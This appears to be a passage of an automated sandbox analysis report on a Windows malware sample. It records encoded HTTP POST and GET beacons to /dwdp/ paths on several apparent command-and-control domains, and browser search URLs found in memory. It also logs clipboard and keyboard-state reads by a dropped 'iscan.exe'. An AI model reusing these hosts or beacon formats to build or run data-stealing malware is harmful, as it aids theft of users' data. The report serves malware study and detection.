          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.t4yfrance.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.t4yfrance.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.t4yfrance.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 41 55 49 44 74 64 4f 6e 28 46 54 77 32 47 48 49 61 38 72 30 70 57 78 30 51 7a 6e 58 66 47 4c 58 30 61 36 4c 62 66 57 69 7e 38 51 2d 78 36 6f 65 74 39 37 4e 76 36 67 74 6f 53 53 42 4d 35 74 2d 50 78 68 42 52 2d 30 6d 54 75 4c 38 6b 67 42 4a 41 62 30 39 54 57 39 75 4e 6e 33 6d 78 43 38 57 4c 74 46 69 31 37 51 7a 49 6c 52 63 56 44 69 69 65 63 64 4e 47 58 68 41 71 58 68 4e 63 4f 49 70 4c 4c 67 32 78 69 79 33 6b 71 56 33 33 49 79 35 36 4d 58 51 74 52 51 4e 6f 35 30 78 61 58 4e 43 54 79 47 6b 78 31 74 5f 30 4d 41 4c 4d 69 72 57 71 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=AUIDtdOn(FTw2GHIa8r0pWx0QznXfGLX0a6LbfWi~8Q-x6oet97Nv6gtoSSBM5t-PxhBR-0mTuL8kgBJAb09TW9uNn3mxC8WLtFi17QzIlRcVDiiecdNGXhAqXhNcOIpLLg2xiy3kqV33Iy56MXQtRQNo50xaXNCTyGkx1t_0MALMirWqg).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.t4yfrance.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.t4yfrance.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.t4yfrance.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 41 55 49 44 74 64 4f 6e 28 46 54 77 77 6d 58 49 59 66 44 30 72 32 78 33 56 7a 6e 58 52 6d 4c 54 30 61 7e 4c 62 65 44 5f 35 4a 41 2d 78 4a 51 65 74 62 48 4e 70 36 67 74 28 69 54 47 49 35 74 73 50 77 45 36 52 36 77 51 54 73 6e 38 69 6d 4e 4a 57 4c 30 36 4d 6d 39 56 4d 6e 33 6c 38 69 38 57 4c 73 35 45 31 35 35 4d 49 6b 70 63 56 32 75 69 65 5a 70 4f 4a 6e 68 42 31 48 68 4e 63 4f 55 32 4c 4c 68 42 78 6a 61 6e 6b 71 31 33 32 61 36 35 35 64 58 54 37 78 51 4b 33 4a 31 78 66 56 41 30 66 78 79 76 35 6d 78 79 31 37 78 75 41 43 43 6a 30 4d 76 55 51 6e 4f 39 48 48 52 6e 5a 31 46 38 42 4d 52 6b 52 68 50 30 64 52 4f 70 73 30 47 43 5a 6a 68 4c 48 4e 51 32 54 71 77 77 62 32 7e 49 58 70 37 43 63 32 4b 55 44 58 41 6c 70 45 55 32 45 47 78 49 75 53 74 32 73 31 39 36 6a 77 28 6c 34 48 57 49 57 7a 4f 72 74 6a 74 62 49 59 79 5a 6e 45 63 51 65 4f 6d 36 54 6b 32 44 37 44 48 69 63 31 41 55 4e 54 45 36 6f 7a 49 79 63 61 4f 42 67 59 42 7a 32 46 65 63 44 4e 75 46 37 58 6a 6e 79 76 4a 53 6b 38 63 54 71 76 68 58 4d 6e 30 6e 6b 4e 79 30 4e 6b 42 50 50 4d 32 69 56 76 73 65 6f 6c 72 42 70 72 32 61 59 4a 53 42 42 45 45 6e 59 64 78 51 49 49 42 5f 64 72 59 47 75 70 36 67 34 36 32 5a 72 75 55 76 64 65 53 63 71 35 28 6d 69 4c 41 6b 41 6f 34 76 37 4b 4f 4f 37 31 44 6a 6e 73 46 56 4f 53 6b 34 35 43 6d 30 4a 7a 4e 31 28 7a 49 6a 31 69 35 33 52 43 51 33 68 5a 30 2d 64 78 72 51 28 73 35 4e 6f 77 7a 79 56 4d 49 32 4a 46 62 53 4d 6c 77 36 49 65 47 57 55 2d 6a 41 61 65 4c 75 6c 35 5a 65 6d 56 73 53 59 6f 6f 67 59 38 7a 51 45 6b 6c 42 32 43 71 6b 38 35 71 61 6d 72 4f 63 6c 4d 77 54 73 68 58 32 68 48 6c 6b 43 63 6d 77 53 51 6c 74 4e 36 6a 6b 7e 68 36 35 37 77 62 36 53 73 73 43 28 66 35 50 43 61 57 79 46 51 4d 6a 39 49 73 78 4c 4a 68 36 47 55 37 5a 52 59 73 4b 74 35 51 55 45 54 64 77 6a 35 44 44 39 70 73 4b 35 6d 69 50 6a 6f 7a 49 38 54 59 59 64 70 49 71 31 46 76 56 61 39 30 6a 68 6d 37 74 79 52 28 62 36 75 6c 49 62 39 54 76 44 36 39 30 30 45 6b 70 43 6a 73 53 44 73 57 78 49 78 66 34 30 58 63 4f 4d 61 5a 73 6a 79 61 4b 37 50 7e 6f 6e 72 53 6b 6d 43 78 43 6c 46 56 68 39 33 39 55 51 42 4a 4f 4f 72 41 57 51 65 79 6f 43 38 5a 41 28 79 6d 39 53 35 53 47 56 38 78 33 62 48 46 59 62 44 6c 39 4e 58 47 49 38 6c 4a 4a 76 5a 50 47 79 52 7e 4f 65 35 52 49 37 50 43 42 45 30 68 43 41 4e 45 7a 75 72 38 57 36 4f 63 39 49 59 65 36 71 57 44 75 6e 49 32 73 56 43 68 32 71 75 31 34 74 6f 7a 57 51 59 39 33 39 70 56 71 57 35 48 56 4f 41 58 33 61 44 4d 54 64 30 6d 65 30 4f 68 6b 61 76 7e 56 32 44 4b 35 6d 58 6d 45 38 50 58 63 76 4b 7a 6c 32 6a 65 52 73 55 71 76 47 51 49 6d 42 65 33 65 69 58 44 65 34 66 4
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.a8-group.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.a8-group.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.a8-group.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 4f 51 7a 71 33 76 46 44 65 68 4e 39 6a 2d 65 35 67 6d 31 5a 57 71 6d 51 76 67 77 48 4e 35 53 67 62 6b 38 7a 44 41 48 50 37 54 6d 74 35 74 49 5a 79 56 4d 6e 64 73 46 5f 68 68 67 76 6f 70 6e 39 7e 64 54 4c 4d 30 79 78 6b 55 33 6a 51 4d 57 75 50 41 70 55 54 4e 64 4e 47 64 51 48 48 74 49 4a 73 56 76 4d 4b 34 73 71 34 5a 38 71 28 76 56 72 4c 36 53 31 31 47 53 43 58 44 77 33 50 30 55 61 39 36 37 57 47 65 4d 38 28 43 72 44 47 4e 57 50 36 37 56 5f 71 73 4f 47 32 37 4c 6f 6b 73 67 32 4b 70 45 47 47 48 4c 71 41 72 75 48 47 45 38 42 47 51 64 4c 7e 51 35 56 75 7a 6b 76 66 65 59 49 35 4f 65 6d 5a 46 42 38 71 4b 48 64 4b 53 4f 32 58 73 28 41 50 38 70 4b 44 42 62 62 58 65 4a 55 34 55 6f 62 4f 57 34 32 53 44 51 4f 57 57 4b 5f 51 5a 34 49 73 35 56 5f 69 33 75 58 45 4e 59 35 57 76 68 4f 32 41 6c 47 78 67 69 58 4f 58 4a 54 63 6a 47 79 28 79 6e 5a 36 44 49 43 51 78 63 6c 48 45 58 64 50 6b 6a 73 4b 61 6a 5a 59 78 63 74 32 4e 71 61 44 77 6f 58 45 47 4f 68 61 43 46 6c 39 4a 59 37 7a 70 38 53 33 7a 28 53 78 33 6f 5a 44 6d 28 33 77 30 28 6d 79 44 73 65 6e 65 66 58 63 66 28 65 73 6e 5a 50 6a 33 58 49 39 51 32 6e 61 42 43 39 53 4f 66 65 76 38 32 31 6f 72 6d 72 76 33 4d 35 28 70 46 58 5a 4d 51 48 79 58 6b 36 62 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=OQzq3vFDehN9j-e5gm1ZWqmQvgwHN5Sgbk8zDAHP7Tmt5tIZyVMndsF_hhgvopn9~dTLM0yxkU3jQMWuPApUTNdNGdQHHtIJsVvMK4sq4Z8q(vVrL6S11GSCXDw3P0Ua967WGeM8(CrDGNWP67V_qsOG27Loksg2KpEGGHLqAruHGE8BGQdL~Q5VuzkvfeYI5OemZFB8qKHdKSO2Xs(AP8pKDBbbXeJU4UobOW42SDQOWWK_QZ4Is5V_i3uXENY5WvhO2AlGxgiXOXJTcjGy(ynZ6DICQxclHEXdPkjsKajZYxct2NqaDwoXEGOhaCFl9JY7zp8S3z(Sx3oZDm(3w0(myDsenefXcf(esnZPj3XI9Q2naBC9SOfev821ormrv3M5(pFXZMQHyXk6bQ).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.a8-group.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.a8-group.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.a8-group.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 4f 51 7a 71 33 76 46 44 65 68 4e 39 28 66 65 35 6a 52 68 5a 43 36 6d 51 6b 41 77 46 4e 35 53 6a 62 6b 39 36 44 42 44 66 37 67 47 74 34 5f 41 5a 78 6e 55 6e 61 73 46 38 6d 52 68 6b 6d 4a 6e 6f 7e 64 53 67 4d 78 53 78 6b 56 54 6a 51 4a 71 75 50 54 78 58 51 4e 64 50 41 64 52 52 4d 4e 49 51 73 56 79 56 4b 38 38 71 34 61 55 71 7e 65 56 72 46 4d 47 32 69 57 53 48 62 6a 77 38 64 30 55 57 39 36 37 6f 47 65 4d 61 28 41 44 44 47 39 47 50 35 59 39 34 68 73 4f 35 36 62 4b 4a 30 73 64 66 66 70 51 75 4c 55 72 36 48 75 50 6b 46 41 78 65 57 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=OQzq3vFDehN9(fe5jRhZC6mQkAwFN5Sjbk96DBDf7gGt4_AZxnUnasF8mRhkmJno~dSgMxSxkVTjQJquPTxXQNdPAdRRMNIQsVyVK88q4aUq~eVrFMG2iWSHbjw8d0UW967oGeMa(ADDG9GP5Y94hsO56bKJ0sdffpQuLUr6HuPkFAxeWA).
          Source: global trafficHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.a8-group.comConnection: closeContent-Length: 5336Cache-Control: no-cacheOrigin: http://www.a8-group.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.a8-group.com/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 4f 51 7a 71 33 76 46 44 65 68 4e 39 35 4d 57 35 68 32 31 5a 56 4b 6d 50 68 41 77 46 55 4a 53 6e 62 6c 42 36 44 41 48 50 37 57 65 74 35 75 51 5a 78 46 4d 6e 63 73 46 38 75 78 67 76 6f 70 6e 79 7e 65 75 47 4d 30 7e 48 6b 58 66 6a 52 66 75 75 62 6a 78 55 62 4e 64 4b 48 64 51 48 49 4e 49 51 73 56 28 45 4b 34 49 55 34 61 38 71 28 72 42 72 46 4b 53 31 6a 47 53 43 55 44 77 38 64 30 59 5a 39 36 37 43 47 66 6b 4b 28 41 6a 44 47 76 65 50 70 64 64 5f 32 73 4f 45 32 37 4c 69 37 63 73 58 4b 70 49 53 47 46 58 36 41 71 79 48 47 6b 38 42 57 46 70 4c 70 41 34 2d 68 54 6b 79 66 65 45 75 35 50 32 6d 5a 41 70 73 74 34 58 64 46 53 65 32 55 50 62 44 4e 38 6f 67 62 78 62 41 41 4f 46 35 34 55 34 66 4f 58 67 32 53 57 6f 4f 57 6e 4b 5f 64 62 51 49 6d 35 56 37 69 33 75 45 61 39 55 65 57 76 39 77 32 46 70 47 77 51 65 58 4f 6b 42 54 62 56 4f 79 69 79 6e 58 74 54 49 32 46 42 63 72 48 45 65 47 50 6b 4b 78 4b 62 54 5a 66 67 4d 74 32 63 71 62 49 41 6f 54 45 47 4f 32 61 43 46 66 39 4a 63 46 7a 6f 4d 43 32 44 44 53 7e 55 77 5a 44 56 48 33 35 45 28 6c 6b 54 73 54 6e 66 6a 6f 63 66 53 46 73 69 68 50 69 47 28 49 39 51 6d 6e 59 53 71 39 63 75 66 62 37 4d 33 67 67 4a 58 36 6c 31 38 54 78 71 68 6f 59 72 70 41 37 32 35 45 47 31 4c 30 69 35 76 6d 50 38 75 48 44 64 59 77 6f 77 4d 52 70 74 6a 7a 59 71 66 56 56 6a 52 41 5a 48 35 30 61 5a 31 4a 64 39 4d 73 6c 6a 54 47 4a 4c 58 59 48 71 4e 54 57 58 44 4d 4d 52 63 69 44 4e 34 33 6c 58 41 43 39 34 63 31 4e 6c 66 56 79 6d 55 44 71 5a 4f 33 28 66 43 35 30 48 58 65 72 71 6d 69 6b 62 77 6c 6a 4e 51 67 39 34 49 36 33 71 57 44 41 76 6e 52 6b 63 78 6a 6c 47 53 4c 65 6c 74 42 75 4a 63 67 72 6b 71 6e 4b 37 46 73 4a 45 42 63 76 49 77 6e 5a 46 4f 4d 76 44 4f 2d 47 41 4e 52 56 79 65 52 55 49 51 37 32 58 4a 6d 37 78 6c 5a 78 4a 57 44 4e 63 30 35 47 41 43 64 66 44 6b 52 71 57 6a 52 56 73 39 49 51 66 41 52 76 5a 64 61 6d 4c 4e 49 6d 73 6d 37 33 4e 65 6c 79 4d 55 75 59 39 78 6e 56 6d 77 7a 65 53 66 38 70 64 7a 65 31 6f 66 31 4c 46 36 53 7e 72 37 72 6f 43 39 31 5a 5a 42 69 48 58 41 55 56 6c 6f 35 71 4e 74 78 42 63 57 77 64 65 55 6f 73 73 7e 6f 54 6d 63 7a 7e 63 68 45 38 58 35 32 77 36 48 6c 78 68 65 42 38 46 28 4a 42 4f 65 6c 6c 32 39 69 62 4f 7e 5f 54 4d 63 70 6d 75 45 61 77 6e 45 6d 4f 76 52 30 6c 42 4d 66 38 50 69 4d 4a 69 76 55 30 4d 76 54 44 35 61 30 6d 39 55 61 52 4f 35 75 69 43 38 6a 58 69 71 63 47 55 35 76 41 2d 56 68 48 5a 78 51 30 73 34 35 5a 39 56 46 42 55 35 69 6c 5f 39 53 65 6d 72 70 7a 37 41 6a 53 5a 43 6b 62 50 4a 6f 4f 63 79 48 33 41 51 56 67 71 38 52 49 49 77 35 68 59 49 33 52 66 61 57 5a 69 56 52 76 36 4f 46 34 62 70 32 53 57 51 5
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:22 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:30 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:32 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 30 Nov 2022 01:22:34 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 77 64 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dwdp/ was not found on this server.</p></body></html>
          Source: PrWP76ejHO.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: PrWP76ejHO.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: 1x6VE38oK.22.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 1x6VE38oK.22.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 1x6VE38oK.22.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 1x6VE38oK.22.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: ipconfig.exe, 00000016.00000003.426035768.0000000006F71000.00000004.00000800.00020000.00000000.sdmp, 1x6VE38oK.22.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: ipconfig.exe, 00000016.00000002.512572827.00000000037FA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.t4yfrance.com/dwdp/?DDK8=DL0dq8Xp&THg8gZ=NWgjuoil9S/
          Source: ipconfig.exe, 00000016.00000002.512572827.00000000037FA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.t4yfrance.com/dwdp/?DDK8=DL0dq8Xp&amp;THg8gZ=NWgjuoil9S/
          Source: unknownHTTP traffic detected: POST /dwdp/ HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.fedefarmatour.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.fedefarmatour.online/dwdp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 54 48 67 38 67 5a 3d 6c 5f 56 79 41 4a 4b 57 6d 35 4a 64 6a 61 6d 7a 5a 34 63 63 52 76 46 56 28 51 77 74 64 72 38 62 74 55 71 38 50 61 76 72 4e 66 75 47 49 61 46 64 33 57 62 35 78 6b 56 50 43 53 4e 4c 31 44 36 73 74 55 4a 38 68 71 4d 53 49 61 64 66 7a 63 61 62 6a 45 59 34 4f 38 56 5a 36 6f 65 77 61 57 46 63 4d 31 6b 41 4f 33 78 6d 63 5f 67 6a 4d 38 77 66 77 6e 32 6e 6b 46 6f 4a 4d 51 43 49 39 71 36 4a 48 67 51 38 7e 50 61 6e 72 33 43 63 35 41 30 77 67 77 7e 47 64 79 79 71 73 73 62 4d 30 67 75 38 41 6b 34 2d 53 6c 4c 5f 7a 67 6b 4e 77 38 65 5f 4c 42 78 4c 4e 37 6c 32 66 63 6f 59 37 41 38 65 7e 7a 34 44 59 4c 69 33 67 4f 32 74 4a 66 4b 73 5a 4e 7a 46 4b 63 36 67 53 6a 30 6a 42 38 31 47 48 36 58 58 4c 48 53 51 74 6e 64 54 38 48 53 6c 70 67 5a 42 31 34 66 2d 56 55 67 49 35 5a 48 71 77 48 6d 61 4f 57 32 41 45 4c 34 6b 49 76 4f 6e 69 48 72 51 32 74 77 6a 4a 6f 5a 76 5a 4d 76 48 67 6f 61 69 54 59 67 65 7e 70 28 53 43 4e 33 74 35 30 69 45 52 77 49 6b 78 4a 55 66 28 6c 4a 5a 38 57 28 79 36 2d 7a 51 38 31 36 41 50 66 52 7a 42 69 49 34 69 68 51 67 39 66 76 79 79 76 56 6d 6b 4c 76 32 73 74 71 37 53 64 37 32 28 77 28 30 5a 6e 53 6e 5a 76 6f 4e 64 79 74 75 6b 47 4f 45 64 63 51 34 55 46 39 37 57 4f 6e 71 77 71 4e 73 42 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: THg8gZ=l_VyAJKWm5JdjamzZ4ccRvFV(Qwtdr8btUq8PavrNfuGIaFd3Wb5xkVPCSNL1D6stUJ8hqMSIadfzcabjEY4O8VZ6oewaWFcM1kAO3xmc_gjM8wfwn2nkFoJMQCI9q6JHgQ8~Panr3Cc5A0wgw~GdyyqssbM0gu8Ak4-SlL_zgkNw8e_LBxLN7l2fcoY7A8e~z4DYLi3gO2tJfKsZNzFKc6gSj0jB81GH6XXLHSQtndT8HSlpgZB14f-VUgI5ZHqwHmaOW2AEL4kIvOniHrQ2twjJoZvZMvHgoaiTYge~p(SCN3t50iERwIkxJUf(lJZ8W(y6-zQ816APfRzBiI4ihQg9fvyyvVmkLv2stq7Sd72(w(0ZnSnZvoNdytukGOEdcQ4UF97WOnqwqNsBA).
          Source: unknownDNS traffic detected: queries for: www.inhomeyoga.com
          Source: global trafficHTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=as8dBOCYMIlGkdFtu6bNi6R+poUd8qernbVKNux/Lg6XWSTTcIv/9iufEycx+V+hXMP21oAGdeFqW0RuMIySji5bX/9mKLXNqQ== HTTP/1.1Host: www.inhomeyoga.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dwdp/?THg8gZ=o99SD4CnjZ1qu7iTZtFfc7Nx3UYgSJ0Ur2vCMIrwN9S0TIs4+nDL6lw5CChyhzqrvnlUg4IJDbpF+LHriFN/RsV5sIy/QX8aQA==&DDK8=DL0dq8Xp HTTP/1.1Host: www.fedefarmatour.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dwdp/?DDK8=DL0dq8Xp&THg8gZ=NWgjuoil9S/+22DuNJW9gHFfRnzyfGvnsPD5fu3f3YQDroVAltOshqAP1UOAIJ0eSwU/Ico7U9Xz8hxCOYRKQwl8NX3l5SYpCA== HTTP/1.1Host: www.t4yfrance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /dwdp/?THg8gZ=DSbK0Z5FDwQug92xqW96a+2ughsfKsmWbm0zJjXp1SGH3e562FU2SdtvukdrkYmM3MO1KHWCknXXR+yfUTM1LtpOX41OHf8llQ==&DDK8=DL0dq8Xp HTTP/1.1Host: www.a8-group.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_004050C0 OpenClipboard,GetClipboardData,GlobalLock,GlobalSize,VkKeyScanW,MapVirtualKeyW,GlobalUnlock,CloseClipboard,
          Source: PrWP76ejHO.exe, 00000000.00000002.254662988.000000000080A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
          Source: C:\Users\user\AppData\Local\Temp\iscan.exeCode function: 1_2_00404020 GetKeyboardState,
